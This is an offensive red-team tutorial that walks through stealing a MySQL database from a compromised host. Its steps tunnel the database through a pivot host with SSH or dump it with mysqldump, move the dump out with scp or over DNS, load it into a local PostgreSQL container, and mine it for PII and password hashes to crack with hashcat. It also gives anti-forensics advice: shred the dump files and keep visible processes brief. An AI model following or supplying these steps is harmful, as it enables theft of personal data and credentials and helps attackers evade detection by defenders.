
Data exfiltration - Migrating MySQL to PostgreSQL with Docker and pgloader


Introduction

As a seasoned red team operator, gaining shell access is often just the beginning. The real value—the “crown jewels”—often lives in the database. You might find customer data, intellectual property, or plain-text credentials that unlock the rest of the network.

Often, you land on a target running MySQL. While you can query it in place, this is risky. Long-running analytical queries can spike CPU usage, alert defenders, or even lock production tables, causing a Denial of Service.

The Solution: exfiltrate the data to a local environment where you can analyze it safely and aggressively.

In this guide, we will use Docker to spin up a sacrificial PostgreSQL instance and pgloader to convert the target’s MySQL schema and data into Postgres format.

Why Postgres? Because it offers superior analytical capabilities (regex, full-text search) and integrates better with many offline analysis tools than MySQL. Plus, pgloader handles the dirty work of type conversion for us.


Part 1: The Red Team Infrastructure

Before we move data, we need a stable container to hold it. We use Docker to keep our host OS clean.

1. Spinning up PostgreSQL via Docker

We mount a volume so the data persists even if the container is removed or recreated.

# Create a local directory for persistence
mkdir -p ~/loot/postgres_data

# Run the container
# Pin Postgres 14 for reproducibility. Older pgloader builds can struggle with
# SCRAM-SHA-256 auth (the default since PG 14); upgrade pgloader if you hit auth errors.
docker run --name postgres-exfil \
  -e POSTGRES_PASSWORD=SuperSecretPassword123 \
  -v ~/loot/postgres_data:/var/lib/postgresql/data \
  -p 5432:5432 \
  -d postgres:14
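
Before pointing anything at it, run a quick sanity check (this assumes a local psql client, e.g. the postgresql-client package on Debian-based distros):

# Confirm the container is up and accepting connections
PGPASSWORD=SuperSecretPassword123 psql -h 127.0.0.1 -U postgres -c 'SELECT version();'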

2. Preparing the Tunnel (For Live Migration)

If you have a live connection to the target network, you need to expose the internal MySQL port (3306) to your localhost.

# Local Port Forwarding via SSH
ssh -L 3306:127.0.0.1:3306 user@pivot-host

Note: We assume the MySQL server is listening on localhost of the pivot host. If it lives elsewhere, adjust the forward target, as in the example below.
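
For example, if MySQL runs on a separate internal host (10.0.0.5 below is a placeholder), forward through the pivot to it:

# Forward local 3306 to an internal MySQL server via the pivot
ssh -L 3306:10.0.0.5:3306 user@pivot-host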


Part 2: The “Live” Migration (Networked)

If you have a high-bandwidth, stable connection, pgloader can stream data directly from the target to your local Docker container. This is the fastest method.

1. Installing pgloader

sudo apt-get install pgloader
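
If your distribution ships a stale build (see the SCRAM note in Part 1), the project's official Docker image is an alternative; the tag below is an assumption, and for real migrations you would add --network host so 127.0.0.1 in the connection strings still reaches your tunnel and Postgres container:

# Alternative: run pgloader from its official image
docker run --rm dimitri/pgloader:latest pgloader --version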

2. The Migration Command

pgloader handles schema translation (e.g., converting MySQL INT(11) to Postgres integer).

# Syntax: pgloader source target
pgloader mysql://root:password@127.0.0.1/target_db \
         postgresql://postgres:SuperSecretPassword123@127.0.0.1/target_db_exfil

Under the Hood:

  1. Connects to MySQL (Target) via the SSH tunnel.
  2. Connects to Postgres (Local) via Docker.
  3. Reads schema, converts types, creates tables.
  4. Batches and streams data.

Note: If you encounter SSL errors connecting to older MySQL servers, add ?useSSL=false to the source connection string.
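
For repeatable runs, the same migration can be written as a pgloader command file. The options below are a reasonable starting set rather than a definitive configuration, and exfil.load is an arbitrary filename:

-- exfil.load
LOAD DATABASE
     FROM mysql://root:password@127.0.0.1/target_db
     INTO postgresql://postgres:SuperSecretPassword123@127.0.0.1/target_db_exfil
WITH include drop, create tables, create indexes, reset sequences
ALTER SCHEMA 'target_db' RENAME TO 'public';

Run it with pgloader exfil.load. The ALTER SCHEMA clause moves the migrated tables into Postgres's default public schema, which saves you from qualifying every table name during analysis.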


Part 3: The “Offline” Migration (Air-Gapped / Restricted)

Sometimes, you cannot open a direct tunnel. The network might be unstable, or strict egress filtering blocks your connection. In this case, you must dump the data to a file, exfiltrate the file, and load it locally.

Step 1: Dump on Target

Use mysqldump to create a standard SQL backup.

# On the target machine
mysqldump -u root -p --single-transaction --compatible=postgresql --default-character-set=utf8 target_db > dump.sql

  • --single-transaction: Takes a consistent snapshot without locking InnoDB tables, which matters on a live production target.
  • --compatible=postgresql: Helps (but doesn’t perfectly fix) dialect issues. Note that the MySQL 8.0 client no longer accepts this value, so it only works with older mysqldump builds.

Step 2: Exfiltrate

Use scp or rsync, or if you are desperate, split it into base64 chunks and move it out over DNS.

# Compress it first! Text compresses well.
gzip dump.sql
# Transfer dump.sql.gz to your attacker machine
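
A minimal transfer, assuming SSH access to the pivot and that the dump sits in /tmp:

# Pull the compressed dump over the existing SSH channel
scp user@pivot-host:/tmp/dump.sql.gz ~/loot/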

Step 3: Load Locally

One caveat: pgloader migrates live databases and structured files (CSV, SQLite, and so on); it does not parse raw SQL dumps. Because we dumped with --compatible=postgresql, the direct route is to feed the file to psql and clean up any remaining dialect errors by hand.

# Decompress on attacker machine
gunzip dump.sql.gz

# Load the (mostly) Postgres-compatible dump directly
psql -h 127.0.0.1 -U postgres -d target_db_exfil -f dump.sql
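
If the dump trips over too many dialect errors, a more reliable path is to restore it into a throwaway local MySQL container and let pgloader handle the conversion, exactly as in Part 2 (re-dump without --compatible=postgresql for this route). A sketch, where the container name, password, and port 3307 are placeholders:

# Stage a scratch MySQL container (3307 avoids clashing with any live tunnel)
docker run --name mysql-staging -e MYSQL_ROOT_PASSWORD=staging \
  -e MYSQL_DATABASE=target_db -p 3307:3306 -d mysql:8

# Give MySQL a few seconds to initialize, then restore the dump
mysql -h 127.0.0.1 -P 3307 -u root -pstaging target_db < dump.sql

# Same pgloader invocation as the live migration, pointed at the staging copy
pgloader mysql://root:staging@127.0.0.1:3307/target_db \
         postgresql://postgres:SuperSecretPassword123@127.0.0.1/target_db_exfil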

Part 4: Deep Analysis and Looting

Now that you have the data locally, you can run aggressive queries without fear of crashing production.

Finding PII (Personally Identifiable Information)

# Connect to your local exfil DB
psql -h 127.0.0.1 -U postgres -d target_db_exfil

-- Search for column names that suggest secrets (passwords, SSNs, cards,
-- emails, tokens) across the entire schema
SELECT table_name, column_name
FROM information_schema.columns
WHERE column_name ~* 'pass|ssn|credit|email|token|secret';

Extracting Hashes for Cracking

If the MySQL database stored application passwords, export them for Hashcat.

-- Use psql's client-side \copy so the file lands on your machine, not inside the container
\copy (SELECT username, password FROM users) TO '/tmp/hashes.txt' CSV
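
The cracking step depends entirely on how the application hashed its passwords. As a sketch, if the hashes turn out to be unsalted MD5 (hashcat mode 0) and you have a wordlist handy:

# Strip the CSV to just the hash column, then crack (mode and wordlist are assumptions)
cut -d',' -f2 /tmp/hashes.txt > just_hashes.txt
hashcat -m 0 just_hashes.txt rockyou.txt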

Cross-Referencing Data

You can now join tables that would be too expensive to join on a live system, hunting for patterns like password reuse across accounts or common email domains. As one sketch, assuming the same hypothetical users table as above, you can hunt for hashes shared by multiple accounts:
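
-- Find password hashes shared by more than one account
SELECT password, COUNT(*) AS accounts_sharing
FROM users
GROUP BY password
HAVING COUNT(*) > 1
ORDER BY accounts_sharing DESC;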


Part 5: OpSec and Forensic Considerations

  1. Network Spike: A “Live” migration creates a massive, sustained download stream. This looks like data exfiltration (because it is). Network flow logs will catch this.

  2. Disk I/O: The “Offline” method creates a large file on the target disk. Delete dump.sql and dump.sql.gz immediately after transfer; use shred -u if possible.

  3. Process List: mysqldump and ssh processes are visible to anyone watching the process list, so keep that window short.

  4. Cleanup:

    # Stop the local container when done analyzing
    docker stop postgres-exfil
    # The data persists in ~/loot/postgres_data if you need it later.
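
When the engagement is fully wrapped and the loot has been archived elsewhere, a complete teardown (paths match those from Part 1; the data directory is usually root-owned, hence sudo) removes the local copies as well:

# Full teardown once nothing is needed anymore
docker rm -f postgres-exfil
sudo rm -rf ~/loot/postgres_data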
    

Conclusion

The combination of Docker and pgloader provides a high-speed, reliable pipeline for analyzing target data. Whether you stream it live through a tunnel or carry it out as a dump file, getting the data onto your own infrastructure allows you to work smarter, not harder.

Data is the ultimate payload. Treat it with respect.

Happy hunting!

